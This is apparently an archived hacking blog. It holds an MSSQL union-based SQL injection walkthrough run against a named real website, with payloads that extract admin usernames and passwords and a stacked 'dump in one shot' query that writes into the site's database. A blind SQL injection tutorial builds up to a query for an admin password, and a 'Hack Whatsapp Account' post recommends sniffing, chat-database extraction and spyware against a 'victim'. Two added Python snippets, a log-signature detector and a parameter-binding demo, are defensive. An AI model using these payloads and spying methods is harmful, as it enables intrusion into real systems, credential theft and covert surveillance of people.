Saturday, 15 November 2014

Step by Step MSSQL UNION BASED INJECTION

    MSSQL UNION BASED INJECTION

 

In the Name of ALLAH, the Most Beneficent and the Merciful.

So today I am going to write a tutorial on MSSQL injection. I hope you like it. But first I suggest that you read the basics of SQL injection.
So let's start.

For this tutorial we will use this site:

http://aquaservices.co.in/Product.aspx?Id=13

So, the checking. The first part is the same as for MySQL: first put a single quote ( ' ), then a double quote ( " ), and check the error. From that I came to know this one is a single-quote-based injection.

http://aquaservices.co.in/Product.aspx?Id=13'

It shows an error like this.
 


INFORMATION:
When both the single quote and the double quote give an error, there is a high probability that the injection is integer based. With a single-quote-based injection the double quote does not give an error, and with a double-quote-based injection the single quote does not give an error; when both the single quote and the double quote give an error, apply the golden rule that the injection is integer based.

Now we need to know the comment type for MSSQL.

Let's try the basic one first: (--)
http://aquaservices.co.in/Product.aspx?Id=13--

The home page loads, but the contents are missing.

http://aquaservices.co.in/Product.aspx?Id=13 order by 1 --

Same as above.

http://aquaservices.co.in/Product.aspx?Id=13 order by 100--

Error:
"The ORDER BY position number 100 is out of range of the number of items in the select list. "
  



Now we can continue with ORDER BY, and at last we come to know that 8 is the last working column. The next part is the UNION SELECT query.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select 1,2,3,4,5,6,7,8--


What? We got an error again:

Operand type clash: text is incompatible with int
 


In case of such errors in the UNION SELECT statement we have the option to use null in all columns, so let's try that.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select null,null,null,null,null,null,null,null--

We got another error:
  

The text data type cannot be selected as DISTINCT because it is not comparable.

Here is one more type of error you can find while doing MSSQL injection, and the solution is simply to use "Union All Select" in place of "Union Select". Let's try that again.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select null,null,null,null,null,null,null,null--

Another error:

Conversion from type 'DBNull' to type 'String' is not valid.


The solution for this type of error: here we can see a DBNull to String mismatch, so we have to convert each column one by one and see if we can make it work. To put a string we can use single quotes, but I prefer using the db_name() function to avoid some errors. Here we have eight columns; changing each column one by one is easy here, but it could be a pain when there are 20 or more columns, so my friend Zenodermus Javanicus developed a payload generator to make that easy for us. I am going to generate the payloads which put db_name() in each of the eight columns one by one.

Click Here For Payload
 
 



http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,4,5,6,7,8--

Error: Operand type clash: text is incompatible with int (so it is better to leave this column as an int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,7,8--

Error: Operand type clash: text is incompatible with int (so it is better to leave this column as an int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,db_name(),4,5,6,7,8--

Error: Operand type clash: text is incompatible with int (so it is better to leave this column as an int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,db_name(),5,6,7,8--

Error: Operand type clash: text is incompatible with int (so it is better to leave this column as an int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,db_name(),6,7,8--

Error: Operand type clash: text is incompatible with int (so it is better to leave this column as an int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,db_name(),7,8--

Error: Operand type clash: text is incompatible with int (so it is better to leave this column as an int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),8--

Here we can see the second column getting printed.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,7,db_name()--

Conversion failed when converting the nvarchar value 'AquaService' to data type bit. (Here we can see the database name in the error.)

There are many other ways to collect more information from MSSQL; some of them are given here.
Let's try.

We can put @@version in place of the vulnerable column to get the current version from the database.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,@@version,3,4,5,6,db_name(),8--

Success.
  

Now we will extract the table names. Here the syntax is different from MySQL because MSSQL lacks the LIMIT clause.


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the first table name: AdminLogin

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the second table name: Certificate

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the fourth table name: ClientList


In the same manner we can get all the tables one by one. Now let's get the columns. I will extract the columns from the AdminLogin table.


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 1 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the first column from the AdminLogin table: IsActive

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 2 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the second column from the AdminLogin table: Password

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 4 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the third column from the AdminLogin table: UserName

We got the table names and the column names, and now let's extract the data from them. For concatenation we can use %2b, which is +.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,username%2b' '%2bpassword,3,4,5,6,db_name(),8 from AdminLogin--

At the end I would like to show you a DIOS (Dump In One Shot query) made by my friend Zenodermus Javanicus, which makes the process a lot faster.

http://aquaservices.co.in/Product.aspx?Id=13;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by ZEN ::
'%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name)
from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : '
from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns
 : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into temp_dios_sample END--


It will give an error, but it is actually creating the DIOS table, so now let's check the output under temp_dios_sample.
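Seen from the defender's side, the whole probing sequence above (ORDER BY column counting, UNION ALL SELECT with db_name() and @@version, TOP n subqueries over information_schema, and the stacked BEGIN DECLARE batch) leaves recognisable traces in the web server's access log. The following Python script is added here and is not part of the original post or of the tools it mentions: it URL-decodes each request's query string, tags it against those signatures and counts tagged requests per client. The log lines, client addresses and the placeholder path are constructed for the example.

```python
"""Signature detection for the MSSQL UNION-based probing sequence, run over
constructed access-log lines (added example, not the post's own tooling)."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Each signature corresponds to one step of the probing sequence in the post.
SIGNATURES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),        # column counting
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),  # UNION [ALL] SELECT
    "mssql_builtin": re.compile(r"@@version|\bdb_name\s*\(", re.I),    # MSSQL-specific functions
    "schema_read": re.compile(r"information_schema\.(tables|columns)", re.I),
    "top_n_subquery": re.compile(r"\bselect\s+top\s+\d+\b", re.I),     # MSSQL's LIMIT substitute
    "stacked_tsql": re.compile(r";\s*begin\s+declare\b", re.I),        # stacked T-SQL batch (DIOS)
    "comment_tail": re.compile(r"--\s*$"),                             # trailing comment
}

# Combined log format: client, timestamp, request line, status code.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one client replays steps from the post against a placeholder
# application path, another client makes an ordinary request.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Nov/2014:10:00:01 +0000] "GET /Product.aspx?Id=13 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [15/Nov/2014:10:00:09 +0000] "GET /Product.aspx?Id=13%20order%20by%20100-- HTTP/1.1" 500 1201',
    '203.0.113.5 - - [15/Nov/2014:10:00:31 +0000] "GET /Product.aspx?Id=13%20and%200=1%20Union%20All%20Select%201,@@version,3,4,5,6,db_name(),8-- HTTP/1.1" 200 5302',
    '203.0.113.5 - - [15/Nov/2014:10:01:02 +0000] "GET /Product.aspx?Id=13%20and%200=1%20Union%20All%20Select%201,table_name,3,4,5,6,db_name(),8%20from%20(select%20top%201%20table_name%20from%20information_schema.tables%20order%20by%201)%20as%20t%20order%20by%201%20desc-- HTTP/1.1" 200 5310',
    '198.51.100.7 - - [15/Nov/2014:10:01:10 +0000] "GET /Product.aspx?Id=7 HTTP/1.1" 200 5088',
]


def normalize(query_string):
    """URL-decode (%20, %2b, ...) and collapse whitespace so the signatures see plain SQL."""
    decoded = unquote_plus(query_string)
    return re.sub(r"\s+", " ", decoded).strip()


def classify(query_string):
    """Return the sorted list of signature names that match the decoded query string."""
    text = normalize(query_string)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def parse_line(line):
    """Split one access-log line into client, path, query string and status."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    path, _, query = m.group("target").partition("?")
    return {"client": m.group("client"), "path": path,
            "query": query, "status": int(m.group("status"))}


def scan(lines):
    """Tag every request; return the hits and a per-client count of tagged requests."""
    hits = []
    per_client = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"])
        if tags:
            per_client[rec["client"]] += 1
            hits.append((rec["client"], rec["path"], rec["status"], tags))
    return hits, dict(per_client)


def suspicious_clients(per_client, threshold=2):
    """Clients with at least `threshold` tagged requests: a probing sequence, not a one-off."""
    return sorted(c for c, n in per_client.items() if n >= threshold)


if __name__ == "__main__":
    found, counts = scan(SAMPLE_LOG)
    for client, path, status, tags in found:
        print(f"{client} {path} {status} {','.join(tags)}")
    print("suspicious:", suspicious_clients(counts))
```

A 500 response paired with an order_by_probe tag is the "out of range" error from the column-counting step; together with a later union_select hit from the same client it is the sequence worth alerting on.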





Hope You Like it.
Thanks.

#stay_connected.

Saturday, 1 November 2014

Facebook is now available through Tor


Facebook is now available through Tor for ramped-up privacy

  

The "deep web" is not only home to shady online drug bazaars where you can exchange bitcoins for drugs, but also portals where whistle blowers can safely pass sensitive documents to journalists.

Now, it's also home to Facebook.

The social network announced on Friday that it is now hosted directly on the Tor network to allow for an even more secure and private way to connect to Facebook.
People using Tor, software that allows for safe and anonymous web browsing, can now connect directly to Facebook using its new onion address (https://facebookcorewwwi.onion/), also known as a hidden service.
"It’s important to us at Facebook to provide methods for people to use our site securely," Alec Muffett, a Facebook security engineer, wrote in a post.
Runa Sandvik, a privacy and security researcher previously employed by the Tor Project, said that the idea of Facebook being hosted on the Tor network came up during a conversation with Muffett.
Previously, users could use Tor to connect to Facebook.com, but they would run into a slew of issues — including getting locked out — because the connection would be routed around the world. Thus, it would appear as though a user was connecting from an unusual location, which Facebook treats as a red flag indicating an account has been hacked.
Now, however, you can log on and register on Facebook over Tor using the .onion site without running into these issues, according to Sandvik. "It does provide another level of protection for users who are already using Tor to log on to Facebook."
Connections to Facebook's .onion URL are also end-to-end encrypted, making it harder for hackers, spies or government officials to see users' actions on the social network.
While some reacted with irony, noting that Facebook is usually not the greatest friend to privacy, others applauded the move.
Facebook's announcement comes just a few weeks after the company's latest privacy controversy. In September, some LGBT users complained that Facebook's real-name policy was preventing them from using the network with the name they identify with, even if it's not their legal one. After the uproar, Facebook apologized and hinted that it was going to change the policy.

Wednesday, 29 October 2014

11 free tools to protect your online activity from surveillance

 


You might want more privacy online for any number of reasons — you could be a journalist reporting on a sensitive topic, or you might just want more peace of mind in light of the NSA revelations. To better protect yourself, here are 11 tools (presented in no particular order) to help you encrypt data, block intrusive trackers or remain altogether anonymous on the web. Note that this is by no means an exhaustive list of what's out there, and no security measure is 100% effective. All of the tools listed here are free.

1. Tor Project

Tor is a free software program that allows people to use web connections anonymously. Widely considered to be one of the best privacy tools on the web, Tor can be downloaded as a software package, and there's a Tor-enabled browser available. It's difficult to track information that passes through Tor — so much so that Russian President Vladimir Putin has put up a $110,000 reward for anyone who can crack its secrets.
Where to get it: Direct download

2. The Guardian Project

The Guardian Project creates open-source apps to help people communicate privately. All of the group's software is downloadable for free for Android smartphones. For secure web browsing, there’s a privacy-friendly browser called Orweb that works with a Tor-enabled proxy called Orbot for mobile. There's also a private messaging service called ChatSecure, an app for private phone calls and a pixel-destroying camera tool to blur faces in photos. This project is almost worth a list all its own.
Where to get them: Google Play, Amazon or direct download

3. DuckDuckGo

DuckDuckGo is a search engine that doesn't track or share any of your information. If you're looking for better privacy, use this over Google.
Where to use it: Duckduckgo.com

4. HTTPS Everywhere

When you're browsing the web, you'll notice that URLs typically have the "http://" prefix, if not the more secure version: "https://" (HTTP Secure). The HTTPS Everywhere browser plugin works with Chrome, Firefox and Opera, and it attempts to automatically switch any HTTP web address over to HTTPS, which encrypts communication between you and the server to protect against eavesdropping or impostors.
Where to get it: Google Play or direct download

5. Ghostery

Ghostery allows you to keep tabs on companies that track your visits to websites. With this browser extension, you can block companies from collecting your browsing data. Ghostery has a popup option that displays a message each time you visit a site with a list of who's tracking you.
When I visited Amazon.com, for example, Ghostery showed me I was being tracked by these entities:
Where to get it: Direct download

6. Privacy Badger

Privacy Badger is a browser extension that can block third-party advertisers, but it has a moral compass. If Privacy Badger suspects a tracker is overstepping its bounds by tracking what you're doing without your permission, the extension stops the advertiser in its tracks. It's all based on the principle of user consent: If the advertiser breaks the rules, Privacy Badger cuts the cord.
Where to get it: Direct download

7. GPG

You may have heard of PGP (Pretty Good Privacy), an encryption program developed in the early '90s to make email conversations more secure. It's a bit outdated, though. The better option is GPG. The GNU Privacy Guard system allows you to encrypt and sign your data. Each party has a pair of "keys," one public and one private. The sender, in this case, sends the email to the receiver's public key, but this encrypted message can only be deciphered if the receiver enters his or her private key (that is known only to them) upon reception of the communication.

Where to get it for Windows: Direct download
Where to get it for Mac: Direct download

8. Cryptocat

Cryptocat is an encrypted chatting service that can be added as a browser extension or downloaded as an app for Mac systems. It is one of the more popular encryption tools available, often used by journalists and human rights advocates. Put simply, only the sender and receiver can see the actual content of the message. When messages are traveling through Cryptocat, they’re unreadable. As a bonus, the application supports file-sharing.
Where to get it: Direct download

9. Wickr
    

Mashable previously described Wickr as "Snapchat for grownups," and that's a good way to put it. Wickr sends photos, video and file attachments that will eventually be deleted, but unlike Snapchat, Wickr encrypts messages. Not even Wickr itself is supposed to know what's in the messages you send. What you send can last anywhere from a few seconds to several days.
Where to get it: Google Play and the App Store

10. Signal

For phone calls on iPhones, there's an app called Signal, and it's probably the best iOS app available for phone call encryption. Open Whisper Systems, the developer behind Signal, has an Android equivalent called RedPhone that provides end-to-end encryption. Eventually, RedPhone will be rolled into Signal to unify the platform, but the apps are already compatible with each other. Snowden himself has praised Open Whisper Systems for their easy-to-use encryption apps.
Where to get Signal: App Store
Where to get RedPhone: Google Play

11. Surveillance Self-Defense Guide

For those of you who are very serious about ramping up your privacy online, the Electronic Frontier Foundation, a nonprofit group that advocates for civil rights as they pertain to modern technology, has published an extensive index of security tips and explainers for all sorts of Internet users, be they beginners or experts. It's a good place to tread a bit deeper into protecting yourself from unwanted surveillance.
Where to use it: Ssd.eff.org

Stay Connected....



Monday, 27 October 2014

Hack Whatsapp Account.



As we know, nowadays a bunch of people are using social media, and one of the most important is WhatsApp. Most of us connect to each other through WhatsApp. After a lot of searching I found 3 working WhatsApp hacks, and I want to share them with you.

Let's Get Started.

1. WhatsApp Sniffer.


WhatsApp Sniffer is a tool for rooted terminals to read WhatsApp chats on a Wi-Fi network (works only on open, WEP or WPA/WPA2 networks). It captures the conversations, videos and pictures received by an Android phone, Nokia or iPhone on the same Wi-Fi network.

WhatsAppSniffer just uses the TCPDump program, which reads all the Wi-Fi network packets and filters those whose origin or destination is WhatsApp's servers. All messages are in plain text, so it does not decrypt anything, complying fully with the legal terms of WhatsApp (3.C: "While we do not disallow the use of sniffers such as Ethereal, tcpdump or HttpWatch in general, we do disallow any efforts to reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by WhatsApp clients …")
For WPA/WPA2 encrypted networks, it uses the tool ARPSpoof (optional).
It has not been tested with Windows Phone terminals. It can't read the messages written or received by BlackBerrys, as they use their own servers and not WhatsApp's.

 Requirements

  1. A Rooted Android Device.
  2. Your victim should use the same Wi-Fi network that you are connected to.
  3. WhatsAppSniffer

    2. Decrypting Conversations

    Has your victim locked his WhatsApp? Or do you want all his conversations on your PC? Generally, for security reasons, WhatsApp encrypts the conversations when backing them up to the SD card or phone memory. But I have found a tool on XDA that claims to decrypt all the WhatsApp conversations onto your PC.
    If you have some access to his device you can also send the files via Bluetooth to your device and read all the conversations later.
    This tool is called WhatsApp Xtract, and for this all credit goes to ztedd.
    Some general advice on how to back up WhatsApp and get the database file:

    Android

    - In Whatsapp go to settings – more – Backup Chats
    - Copy the folder “Whatsapp” on the SD card to your backup location (e.g., PC)
    - (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder “TitaniumBackup” on the SD card to your backup location (e.g., PC)
    - Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files “wa.db” and “msgstore.db” you will find inside the Titanium Backup archive “com.whatsapp-[Date]-[some digits].tar.gz”, alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card.

    iPhone

    - use iTunes to create an unencrypted backup
    - use an iPhone backup tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or iPhone Backup Extractor. Make sure to create an unencrypted backup with iTunes, as these tools can't handle encrypted backups. (Another possibility is forensic tools like UFED Physical Analyzer.)

    Blackberry

    - sync your blackberry with desktop manager and then copy the messagestore.db file from SD
    - however, it seems that this file is encrypted? Currently we don’t know how to get the unencrypted messagestore.db file
    - Blackberry not supported yet!

    Nokia

    - not known yet
    - Nokia not supported yet!
    For further detail about this method you can go to this forum thread on XDA.

    3. Using Spywares

    Using 3rd-party spyware can be very useful for spying not only on WhatsApp conversations but also on many other things: you can track the GPS location, capture lock-screen passwords, and monitor websites. There is a lot of spyware on the market, but the one I recommend is BOSSPY, because it's free.


     This article is for educational purposes only. we are not responsible for actions of any individual

Sunday, 19 October 2014

BLIND SQL INJECTION



In the Name of ALLAH the Most Beneficent and the Merciful.
Today I am going to post a tutorial on blind SQL injection.
Why do we call it blind? Because we can't see anything and we don't know anything; what we do is keep asking the database questions and get the reply in the form of YES (page loaded normally) or NO (page did not load normally).

I hope you know the basics of SQL injection.
If you don't, then check these:
  • Click Here  ....::: SQL Injection Error Based:::...
  • Click Here  ...::: SQL Injection Union Based:::...



Blind SQL injection is used when there is no output and no SQL error. That means we can't use union-based injection, in which we get our desired output directly, nor error-based or XPath injection, in which we get our desired output through an error.

In blind SQL injection we make our own queries to the database and ask it whether we are right or wrong.


Lets start...


www.vuln-web.com/photo.php?id=1/ No error; the page loaded normally again.


www.vuln-web.com/photo.php?id=1'  No error; the page loaded normally again.


www.vuln-web.com/photo.php?id=1'    No error, but we found a small change in the website which is different from the others.

As we didn't get the error, let us start with blind SQL injection. Our next task is to try commenting out the rest of the query using our comment types.

www.vuln-web.com/photo.php?id=1'--
No error, but the small change is still there

www.vuln-web.com/photo.php?id=1'%23
No error, and even that change is not there

www.vuln-web.com/photo.php?id=1'/*
No error, but the small change is still there


www.vuln-web.com/photo.php?id=1'-- 
No error, but the small change is still there

That means we can comment out the query using '#'. So we will continue with this one. Time to test whether the injection is really working.
www.vuln-web.com/photo.php?id=1' and true%23 
Normal page returned
www.vuln-web.com/photo.php?id=1' and false%23
The page didn't load as it normally does, as the query didn't return anything.

That is good. We are on the right track; now let's start the blind SQL injection.
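The true/false pair just used is the whole basis of blind injection: the page changes because the input is glued into the SQL text. The following Python example is added here and is not part of the original tutorial; it rebuilds that situation with SQLite standing in for MySQL (so the comment sequence is `--`, since `#` is MySQL-only) and shows that the same two probes become indistinguishable once the id is passed as a bound parameter. The `photos` table and its rows are constructed for the example.

```python
"""Why the boolean oracle behind photo.php?id=1' and true# exists, and why
parameter binding removes it. SQLite stands in for MySQL (constructed demo)."""
import sqlite3


def make_db():
    """Constructed stand-in for the photo table behind photo.php."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO photos VALUES (?, ?)",
                     [(1, "sunset"), (2, "harbour")])
    return conn


def get_photo_vulnerable(conn, id_param):
    """String concatenation: the request value becomes part of the SQL text."""
    sql = "SELECT title FROM photos WHERE id='" + id_param + "'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # errors suppressed, like the "no error" page in the tutorial
    return row[0] if row else None


def get_photo_safe(conn, id_param):
    """Parameter binding: the whole request value is one literal, never SQL syntax."""
    row = conn.execute("SELECT title FROM photos WHERE id=?", (id_param,)).fetchone()
    return row[0] if row else None


def oracle_exists(lookup, conn):
    """True when appending a true vs. false condition changes the response,
    i.e. when the application exposes a blind boolean oracle."""
    true_probe = "1' and 1=1 --"    # `--` plays the role of the tutorial's %23
    false_probe = "1' and 1=0 --"
    return lookup(conn, true_probe) != lookup(conn, false_probe)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true probe :", get_photo_vulnerable(db, "1' and 1=1 --"))
    print("vulnerable, false probe:", get_photo_vulnerable(db, "1' and 1=0 --"))
    print("safe, true probe       :", get_photo_safe(db, "1' and 1=1 --"))
    print("safe, false probe      :", get_photo_safe(db, "1' and 1=0 --"))
    print("oracle (vulnerable):", oracle_exists(get_photo_vulnerable, db))
    print("oracle (safe)      :", oracle_exists(get_photo_safe, db))
```

Both functions still return "sunset" for the legitimate id "1"; only the concatenating one reacts differently to the two probes.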

There are again two ways to do blind SQL injection:
1. The first is for n00bz like me who don't have common sense.
2. The second is for professionals who have good common sense.

Let us first discuss the first one.

In this injection we will use two new functions: the ASCII function and the SUBSTRING function. Programmers and many others may not need any explanation of these, but for those who do:

Ascii('a') will return 97, which is the ASCII value of a. That means we can get the ASCII value of any character passed to this function.

Substring Function 

substring('n00b',1,1) will return n.
substring('n00b',2,1) will return 0.
substring('n00b',3,1) will return 0.
substring('n00b',4,1) will return b.
substring('n00b',5,1) will return an empty string.

I hope you understand the usage of both of them, so now we will use them together.

Ascii(substring('n00b',1,1)): now the substring function will return n, and then ascii will return the ASCII value of n, which is 110.

Okay, using both of these functions will help us query the database. So let's check the internal query part.

Select column_name from table_name where id='input' and Ascii(substring('n00b',1,1))>100;

The above query will give the output successfully, as the condition is true. Now consider:

Select column_name from table_name where id='input' and Ascii(substring('n00b',1,1))>110;

It will return false, as 110 is not greater than 110. So this is how we will inject and query. Let us move to the injection part.
www.vuln-web.com/photo.php?id=1' and Ascii(substring((<your_query_here_which_returns_one_row>),1,1))<any_number_here%23
We can start by retrieving the database name. But I suggest we move to the important part first, checking whether there is some juicy stuff inside, rather than just peeking around. Injection:
www.vuln-web.com/photo.php?id=1' and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97%23
With the above query we asked whether the first character of the first table in the current database is greater than a. If it returns true (page loads normally) then we increase the number and check again.
www.vuln-web.com/photo.php?id=1' and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>110%23
With the above query we asked whether the first character of the first table in the current database is greater than n. If it returns true (page loads normally) then we increase it and check again. Let us assume it didn't return true but returned false (page didn't load normally). Now we decrease and check.
www.vuln-web.com/photo.php?id=1' and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>105%23
Let's assume it returned true. So now we know that the character is between 105 and 110.
www.vuln-web.com/photo.php?id=1' and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=106%23
False


www.vuln-web.com/photo.php?id=1' and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=107%23
False


www.vuln-web.com/photo.php?id=1' and Ascii(substring((Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=108%23
True
So this is it. Now we know the first character; in this manner we keep increasing the second parameter of substring and try to get the whole table name. I really don't feel that I need to type the rest of the commands to continue this injection, as anyone who has read the rest of the tutorial can figure out the remaining part. But actually I don't like this one, as it is so slow, so I somehow figured out another injection which makes blind injection faster. So let's move to that one. Here the injection structure is like this. Getting started with the second one, getting the database name:
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%')%23
Okay, here in the above query you can understand the basic things, as I suppose you have read the other tutorials, so the only things new in this one are 'dual' and the LIKE statement. Dual is a table for testing, so we can use it :D. You can look up the Dual table in MySQL on Wikipedia if you want to go to its roots; what I know is that you can use it and continue the injection. Now the LIKE statement: this is used in place of the = operator, but with LIKE we can actually use wildcard characters. If you don't know what wildcard characters are, then I suggest this place is not for you. Okay, there are two wildcard characters which we are going to use: '_', which stands for a single character, and '%', which stands for any number of characters. Following are some examples of wildcard usage.
Select username from users where city like '%degora%';
This will output all the usernames from the table users whose city column contains degora.

Select city from users where username like 'n00%'
This will output all the cities whose username column starts with n00 or equals n00.


Select city from users where username like '___'
I used 3 underscores, which means any 3 characters, so this will output the city of any user having a 3-character username.


Select username,password from users where city like 'u_t__%'
Here I queried for usernames and passwords where the city starts with 'u', has 't' in the third position and has at least 5 characters. Any name which fits will be returned.
Now let us start our injection using this method. The good thing about this injection is that we can guess, and we can also check whether any given character exists in the word; after collecting this info we can make some nice guesses of our own. Let us first check the number of characters in the current database name.
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '_____')%23 (we started from 5)
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '______')%23 (Now we checked 6)
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '_______')%23 (Now we checked 7)
True
So now we know it has 7 characters. Now let's check the common characters a,e,i,o,u,s,t,r,h
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%a%')%23
True

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%e%')%23
True

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%i%')%23
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%o%')%23
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() like '%u%')%23
False
And so on. After collecting this information, let us assume we got a,e,d,b,s,_,1. Since it's the database name, we can guess it makes the word 'dbase_1'. To make sure we are correct we can check it:
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where database() = 'dbase_1')%23
True
We got the database name. Now let's target tables containing any column name which contains the string "pass".
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')%23
We searched for the first table name which contains a column like pass. If the query returns true, that means there is some output. So now we can start guessing the name after counting the number of characters.
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '____')%23
False

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '_____')%23
True
So we got 5 characters. Now we can start guessing the characters.
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%a%')%23
We checked A

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%s%')%23
We checked 'S'

www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%d%')%23
We Checked 'D'
Let us assume we got e,s,r,u. After getting this we can quickly see that the last one will again be s, which makes 'users'. Let us try:
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like 'users')%23
True
Okay, it worked. Now we will try to get the columns in the same way; I will just give the example query, and you can use the same method to get the data. You can even try common names.
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select column_name from information_schema.columns where table_schema=database() and table_name='users' and column_name like '%username%' limit 0,1) like '%')%23
If they return true then you don't have to waste your time guessing characters.
In the end, the last query we can use to get the admin password is:
www.vuln-web.com/photo.php?id=1' and (select 1 from dual where (select password from users where username like '%admin%' limit 0,1) like '%')%23
I hope it helped you to understand the internal working and how to perform blind SQL injection in a web application.